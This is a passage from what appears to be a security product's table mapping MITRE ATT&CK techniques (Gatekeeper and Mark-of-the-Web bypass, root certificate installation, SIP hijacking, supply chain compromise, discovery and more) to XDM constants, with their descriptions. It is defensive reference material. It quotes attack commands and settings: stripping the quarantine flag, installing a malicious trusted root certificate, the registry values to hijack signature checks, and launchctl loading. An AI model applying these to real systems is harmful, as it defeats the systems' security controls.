Gatekeeper controls in macOS. When documents, applications, or programs are downloaded an extended
attribute (xattr) called com.apple.quarantine can be set on the file by the application performing the
download. This attribute, also known as a quarantine flag, is read by Apple's Gatekeeper defense program
when the file is run and provides a prompt to the user to allow or deny execution. Gatekeeper also monitors
an application's usage of dynamic libraries (dylibs) loaded outside the application folder on any quarantined
binary, often using the dlopen function. If the quarantine flag is set in macOS 10.15+, Gatekeeper also
checks for a notarization ticket and sends a cryptographic hash to Apple's servers to check for validity for all
unsigned executables.(Citation: TheEclecticLightCompany apple notarization )(Citation: Bypassing
Gatekeeper) The quarantine flag is an opt-in system and not imposed by macOS. If an application opts-in,
a file downloaded from the Internet will be given a quarantine flag before being saved to disk. Any
application or user with write permissions to the file can change or strip the quarantine flag. With elevated
permission (sudo), this attribute can be removed from any file. The presence of the
com.apple.quarantine quarantine flag can be checked with the xattr command xattr -l /path/to/
examplefile. Similarly, this attribute can be recursively removed from all files in a folder using xattr, sudo
xattr -d com.apple.quarantine /path/to/folder.(Citation: 20 macOS Common Tools and
Techniques)(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: theevilbit gatekeeper
bypass 2021) Apps and files loaded onto the system from a USB flash drive, optical disk, external hard
drive, from a drive shared over the local network, or using the curl command do not set this flag.
Additionally, it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/
techniques/T1189), which may bypass Gatekeeper. (Citation: Methods of Mac Malware Persistence)
(Citation: Clearing quarantine attribute)(Citation: OceanLotus for OS X) https://attack.mitre.org/techniques/
T1553/001

T1553.004 XDM_CONST.MITRE_TECHNIQUE_SUBVERT_TRUST_CONTROLS_INSTALL_ROOT_CERTIFICATE Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to
adversary controlled web servers. Root certificates are used in public key cryptography to identify a root
certificate authority (CA). When a root certificate is installed, the system or application will trust certificates
in the root's chain of trust that have been signed by the root certificate.(Citation: Wikipedia Root Certificate)
Certificates are commonly used for establishing secure TLS/SSL communications within a web browser.
When a user attempts to browse a website that presents a certificate that is not trusted an error message
will be displayed to warn the user of the security risk. Depending on the security settings, the browser may
not allow the user to establish a connection to the website. Installation of a root certificate on a
compromised system would give an adversary a way to degrade the security of that system. Adversaries
have used this technique to avoid security warnings prompting users when compromised systems connect
over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login
credentials.(Citation: Operation Emmental) Atypical root certificates have also been pre-installed on
systems by the manufacturer or in the software supply chain and were used in conjunction with malware/
adware to provide [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) capability for
intercepting information transmitted over secure TLS/SSL communications.(Citation: Kaspersky Superfish)
Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains
will carry many of the same metadata characteristics of the source and can be used to sign malicious code
that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution
and/or uncover artifacts of Persistence.(Citation: SpectorOps Code Signing Dec 2017) In macOS, the Ay
MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/
Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted
root certificate into the system keychain.(Citation: objective-see ay mami 2018) https://attack.mitre.org/
techniques/T1553/004

T1553.005 XDM_CONST.MITRE_TECHNIQUE_SUBVERT_TRUST_CONTROLS_MARK_OF_THE_WEB_BYPASS Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows,
when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream
(ADS) named Zone.Identifier with a specific value known as the MOTW.(Citation: Microsoft
Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions.
For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View.
Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares
files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent
the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank
MotW 2020)(Citation: Intezer Russian APT Dec 2020) Adversaries may abuse container files such as
compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that
may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW
but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW
is a NTFS feature and many container files do not support NTFS alternative data streams. After a container
file is extracted and/or mounted, the files contained within them may be treated as local files on disk and
run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020) https://
attack.mitre.org/techniques/T1553/005
Original Mapped Description

T1553.003 XDM_CONST.MITRE_TECHNIQUE_SUBVERT_TRUST_CONTROLS_SIP_AND_TRUST_PROVIDER_HIJACKING Adversaries may tamper with SIP and trust provider components to mislead the operating system and
application control tools when conducting signature validation checks. In user mode, Windows
Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and
integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft
signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust
application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an
inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of
a signature. (Citation: SpectorOps Subverting Trust Sept 2017) Because of the varying executable file types
and corresponding signature formats, Microsoft created software components called Subject Interface
Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API
functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify
signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog
signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified
by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017) Similar to [Code
Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert
trust controls and bypass security policies that allow only legitimately signed code to execute on a system.
Adversaries may hijack SIP and trust provider components to mislead operating system and application
control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept
2017) * Modifying the Dll and FuncName Registry values in
HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType
0\CryptSIPDllGetSignedDataMsg\{SIP_GUID} that point to the dynamic link library (DLL) providing a
SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed
file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good
signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an
adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC
Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned
by the function will not match the value computed from the file). * Modifying the Dll and FuncName Registry
values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType
0\CryptSIPDllVerifyIndirectData\{SIP_GUID} that point to the DLL providing a SIP’s
CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash
value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE
(indicating that the validation was successful), an adversary can successfully validate any file (with a
legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the
previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be
redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop
and execute a new file on disk. * Modifying the DLL and Function Registry values in
HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust
provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the
decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking
SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function
from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is
complex). * **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search
Order Hijacking](https://attack.mitre.org/techniques/T1574/001). Hijacking SIP or trust provider components
can also enable persistent code execution, since these malicious components may be invoked by any
application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept
2017) https://attack.mitre.org/techniques/T1553/003

T1195 XDM_CONST.MITRE_TECHNIQUE_SUPPLY_CHAIN_COMPROMISE Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer
for the purpose of data or system compromise. Supply chain compromise can take place at any stage of
the supply chain including: * Manipulation of development tools * Manipulation of a development
environment * Manipulation of source code repositories (public or private) * Manipulation of source code in
open-source dependencies * Manipulation of software update/distribution mechanisms * Compromised/
infected system images (multiple cases of removable media infected at the factory) (Citation: IBM Storwize)
(Citation: Schneider Electric USB Malware) * Replacement of legitimate software with modified versions *
Sales of modified/counterfeit products to legitimate distributors * Shipment interdiction While supply chain
compromise can impact any component of hardware or software, attackers looking to gain execution have
often focused on malicious additions to legitimate software in software distribution or update channels.
(Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011)
Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious
software may be distributed to a broad set of consumers but only move on to additional tactics on specific
victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects
that are used as dependencies in many applications may also be targeted as a means to add malicious
code to users of the dependency. (Citation: Trendmicro NPM Compromise) https://attack.mitre.org/
techniques/T1195

T1195.003 XDM_CONST.MITRE_TECHNIQUE_SUPPLY_CHAIN_COMPROMISE_COMPROMISE_HARDWARE_SUPPLY_CHAIN Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the
purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries
can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high
degree of control over the system. Hardware backdoors may be inserted into various devices, such as
servers, workstations, network infrastructure, or peripherals. https://attack.mitre.org/techniques/T1195/003

T1195.001 XDM_CONST.MITRE_TECHNIQUE_MITRE_TECHNIQUE_SUPPLY_CHAIN_COMPROMISE_COMPROMISE_SOFTWARE_DEPENDENCIES_AND_DEVELOPMENT_TOOLS Adversaries may manipulate software dependencies and development tools prior to receipt by a final
consumer for the purpose of data or system compromise. Applications often depend on external software to
function properly. Popular open source projects that are used as dependencies in many applications may
be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM
Compromise) Targeting may be specific to a desired victim set or may be distributed to a broad set of
consumers but only move on to additional tactics on specific victims. https://attack.mitre.org/techniques/
T1195/001

T1195.002 XDM_CONST.MITRE_TECHNIQUE_SUPPLY_CHAIN_COMPROMISE_COMPROMISE_SOFTWARE_SUPPLY_CHAIN Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of
data or system compromise. Supply chain compromise of software can take place in a number of ways,
including manipulation of the application source code, manipulation of the update/distribution mechanism
for that software, or replacing compiled releases with a modified version. Targeting may be specific to a
desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics
on specific victims.(Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) https://
attack.mitre.org/techniques/T1195/002

T1082 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_INFORMATION_DISCOVERY An adversary may attempt to get detailed information about the operating system and hardware, including
version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from
[System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to
shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts
specific actions. Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather
detailed system information. If running with privileged access, a breakdown of system data can be gathered
through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access
can execute the df -aH command to obtain currently mounted disks and associated freely available space.
[System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information
gathered from other forms of discovery and reconnaissance can drive payload development and
concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques) Infrastructure
as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual
machine information via APIs. Successful authenticated API calls can return data such as the operating
system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon
Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API) https://
attack.mitre.org/techniques/T1082

T1614 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_LOCATION_DISCOVERY Adversaries may gather information in an attempt to calculate the geographical location of a victim host.
Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/
T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary
fully infects the target and/or attempts specific actions. Adversaries may attempt to infer the location of a
system using various system checks, such as time zone, keyboard layout, and/or language settings.
(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT
malware 2020) Windows API functions such as GetLocaleInfoW can also be used to determine the locale
of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may
also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance
Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021) Adversaries may also attempt to
infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.
(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016) https://attack.mitre.org/
techniques/T1614
Original Mapped Description

T1614.001 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_LOCATION_DISCOVERY_SYSTEM_LANGUAGE_DISCOVERY Adversaries may attempt to gather information about the system language of a victim in order to infer the
geographical location of that host. This information may be used to shape follow-on behaviors, including
whether the adversary infects the target and/or attempts specific actions. This decision may be employed
by malware developers and operators to reduce their risk of attracting the attention of specific law
enforcement agencies or prosecution/scrutiny from other entities.(Citation: Malware System Language
Check) There are various sources of data an adversary could use to infer system language, such as
system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but
may involve behaviors such as [Query Registry](https://attack.mitre.org/techniques/T1012) and calls to
[Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: CrowdStrike Ryuk January 2019)
For example, on a Windows system adversaries may attempt to infer the language of a system by querying
the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language or parsing
the outputs of Windows API functions GetUserDefaultUILanguage, GetSystemDefaultUILanguage,
GetKeyboardLayoutList and GetUserDefaultLangID.(Citation: Darkside Ransomware Cybereason)
(Citation: Securelist JSWorm)(Citation: SecureList SynAck Doppelgänging May 2018) On a macOS or
Linux system, adversaries may query locale to retrieve the value of the $LANG environment variable.
https://attack.mitre.org/techniques/T1614/001

T1016 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_NETWORK_CONFIGURATION_DISCOVERY Adversaries may look for details about the network configuration and settings, such as IP and/or MAC
addresses, of systems they access or through information discovery of remote systems. Several operating
system administration utilities exist that can be used to gather this information. Examples include [Arp]
(https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://
attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://
attack.mitre.org/software/S0103). Adversaries may use the information from [System Network Configuration
Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on
behaviors, including determining certain access within the target network and what actions to do next.
https://attack.mitre.org/techniques/T1016

T1016.001 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_NETWORK_CONFIGURATION_DISCOVERY_INTERNET_CONNECTION_DISCOVERY Adversaries may check for Internet connectivity on compromised systems. This may be performed during
automated discovery and can be accomplished in numerous ways such as using [Ping](https://
attack.mitre.org/software/S0097), tracert, and GET requests to websites. Adversaries may use the results
and responses from these requests to determine if the system is capable of communicating with their C2
servers before attempting to connect to them. The results may also be used to identify routes, redirectors,
and proxy servers. https://attack.mitre.org/techniques/T1016/001

T1049 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_NETWORK_CONNECTIONS_DISCOVERY Adversaries may attempt to get a listing of network connections to or from the compromised system they
are currently accessing or from remote systems by querying for information over the network. An adversary
who gains access to a system that is part of a cloud-based environment may map out Virtual Private
Clouds or Virtual Networks in order to determine what systems and services are connected. The actions
performed are likely the same types of discovery techniques depending on the operating system, but the
resulting information may include details about the networked cloud environment relevant to the adversary's
goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon
AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview)
Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/
S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux,
[netstat](https://attack.mitre.org/software/S0104) and lsof can be used to list current connections. who -a
and w can be used to show which users are currently logged in, similar to "net session". https://
attack.mitre.org/techniques/T1049

T1033 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_OWNER_USER_DISCOVERY Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly
uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving
account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The
information may be collected in a number of different ways using other Discovery techniques, because user
and username details are prevalent throughout a system and include running process ownership, file/
directory ownership, session information, and system logs. Adversaries may use the information from
[System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to
shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts
specific actions. Various utilities and commands may acquire this information, including whoami. In macOS
and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /
Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables,
such as %USERNAME% and $USER, may also be used to access this information. https://attack.mitre.org/
techniques/T1033

T1007 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_SERVICE_DISCOVERY Adversaries may try to get information about registered services. Commands that may obtain information
about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://
attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but
adversaries may also use other tools as well. Adversaries may use the information from [System Service
Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on
behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
https://attack.mitre.org/techniques/T1007

T1569 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_SERVICES Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can
execute malicious content by interacting with or creating services either locally or remotely. Many services
are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://
attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary
execution. https://attack.mitre.org/techniques/T1569

T1569.001 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_SERVICES_LAUNCHCTL Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd,
the service management framework for macOS. Launchctl supports taking subcommands on the
command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man) Adversaries
use launchctl to execute commands and programs as [Launch Agent](https://attack.mitre.org/techniques/
T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s. Common subcommands
include: launchctl load,launchctl unload, and launchctl start. Adversaries can use scripts or
manually run the commands launchctl load -w "%s/Library/LaunchAgents/%s" or /bin/launchctl
load to execute [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon]
(https://attack.mitre.org/techniques/T1543/004)s.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS
Common Tools and Techniques) https://attack.mitre.org/techniques/T1569/001

T1569.002 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_SERVICES_SERVICE_EXECUTION Adversaries may abuse the Windows service control manager to execute malicious commands or
payloads. The Windows service control manager (services.exe) is an interface to manage and
manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is
accessible to users via GUI components as well as system utilities such as sc.exe and [Net](https://
attack.mitre.org/software/S0039). [PsExec](https://attack.mitre.org/software/S0029) can also be used to
execute commands or payloads via a temporary Windows service created through the service control
manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/
S0029) and sc.exe can accept remote servers as arguments and may be used to conduct remote
execution. Adversaries may leverage these mechanisms to execute malicious content. This can be done by
either executing a new or modified service. This technique is the execution used in conjunction with
[Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege
escalation. https://attack.mitre.org/techniques/T1569/002

T1529 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_SHUTDOWN_OR_REBOOT Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those
systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some
cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation:
Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer
resources for legitimate users. Adversaries may attempt to shutdown/reboot a system after impacting it in
other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System
Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.
(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018) https://attack.mitre.org/
techniques/T1529
Original Mapped Description

T1124 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_TIME_DISCOVERY An adversary may gather the system time and/or time zone from a local or remote system. The system time
is set and stored by the Windows Time Service within a domain to maintain time synchronization between
systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows
Time Service) System time information may be gathered in a number of ways, such as with [Net](https://
attack.mitre.org/software/S0039) on Windows by performing net time \\hostname to gather the system
time on a remote system. The victim's time zone may also be inferred from the current system time or
gathered by using w32tm /tz. (Citation: Technet Windows Time Service) This information could be useful
for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://
attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information
based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/
techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or
delaying execution until a specified date/time.(Citation: AnyRun TimeBomb) https://attack.mitre.org/
techniques/T1124

T1080 XDM_CONST.MITRE_TECHNIQUE_TAINT_SHARED_CONTENT Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such
as network drives or internal code repositories. Content stored on network drives or in other shared
locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files.
Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's
code on a remote system. Adversaries may use tainted shared content to move laterally. A directory share
pivot is a variation on this technique that uses several other techniques to propagate malware when users
access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/
T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to
look like the real directories, which are hidden through [Hidden Files and Directories](https://
attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded
command that executes the hidden malware file in the directory and then opens the real intended directory
so that the user's expected action still occurs. When used with frequently used network directories, the
technique may result in frequent reinfections and broad access to systems and potentially to new and
higher privileged accounts. (Citation: Retwin Directory Share Pivot) Adversaries may also compromise
shared network directories through binary infections by appending or prepending its code to the healthy
binary on the shared network directory. The malware may modify the original entry point (OEP) of the
healthy binary to ensure that it is executed before the legitimate code. The infection could continue to
spread via the newly infected file when it is executed by a remote system. These infections may target both
binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR,
.BAT, and/or .VBS. https://attack.mitre.org/techniques/T1080

T1221 XDM_CONST.MITRE_TECHNIQUE_TEMPLATE_INJECTION Adversaries may create or modify references in Office document templates to conceal malicious code or
force authentication attempts. Microsoft’s Office Open XML (OOXML) specification defines an XML-based
format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML
files are packed together ZIP archives compromised of various XML files, referred to as parts, containing
properties that collectively define how a document is rendered. (Citation: Microsoft Open XML July 2017)
Properties within parts may reference shared public resources accessed via online URLs. For example,
template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the
document is loaded. Adversaries may abuse this technology to initially conceal malicious code to be
executed via documents. Template references injected into a document may enable malicious payloads to
be fetched and executed when the document is loaded. (Citation: SANS Brian Wiltse Template Injection)
These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/
techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade
static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious
payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild
where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes
Template Injection OCT 2017) This technique may also enable [Forced Authentication](https://
attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and
triggering an authentication attempt. (Citation: Anomali Template Injection MAR 2018) (Citation: Talos
Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016) https://attack.mitre.org/techniques/
T1221

T1205 XDM_CONST.MITRE_TECHNIQUE_TRAFFIC_SIGNALING Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence
or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent
to a system to trigger a special response, such as opening a closed port or executing a malicious task. This
may take the form of sending a series of packets with certain characteristics before a port will be opened
that the adversary can use for command and control. Usually this series of packets consists of attempted
connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/
techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics.
After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could
also be implemented by custom software. Adversaries may also communicate with an already open port,
but the service listening on that port will only respond to commands or trigger other malicious functionality if
passed the appropriate magic value(s). The observation of the signal packets to trigger the communication
can be conducted through different methods. One means, originally implemented by Cd00r (Citation:
Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method
leverages raw sockets, which enables the malware to use ports that are already open for use by other
programs. On network devices, adversaries may use crafted packets to enable [Network Device
Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device
such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger
module modification of malware implants on the device, adding, removing, or changing malicious
capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog
Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first
achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the
monolithic nature of the architecture. Adversaries may also use the Wake-on-LAN feature to turn on
powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be
powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become
a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL) (Citation: AMD Magic Packet)
https://attack.mitre.org/techniques/T1205

T1205.001 XDM_CONST.MITRE_TECHNIQUE_TRAFFIC_SIGNALING_PORT_KNOCKING Adversaries may use port knocking to hide open ports used for persistence or command and control. To
enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed
ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but
could also be implemented by custom software. This technique has been observed to both for the dynamic
opening of a listening port as well as the initiating of a connection to a listening server on a different system.
The observation of the signal packets to trigger the communication can be conducted through different
methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap
libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the
malware to use ports that are already open for use by other programs. https://attack.mitre.org/techniques/
T1205/001

T1537 XDM_CONST.MITRE_TECHNIQUE_TRANSFER_DATA_TO_CLOUD_ACCOUNT Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to
another cloud account they control on the same service to avoid typical file transfers/downloads and
network-based exfiltration detection. A defender who is monitoring for large transfers to outside the cloud
environment through normal file transfers or over command and control channels may not be watching for
data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud
provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data
transfers over external network interfaces. Incidents have been observed where adversaries have created
backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul
2018) https://attack.mitre.org/techniques/T1537

T1127 XDM_CONST.MITRE_TECHNIQUE_TRUSTED_DEVELOPER_UTILITIES_PROXY_EXECUTION Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads.
There are many utilities used for software development related tasks that can be used to execute code in
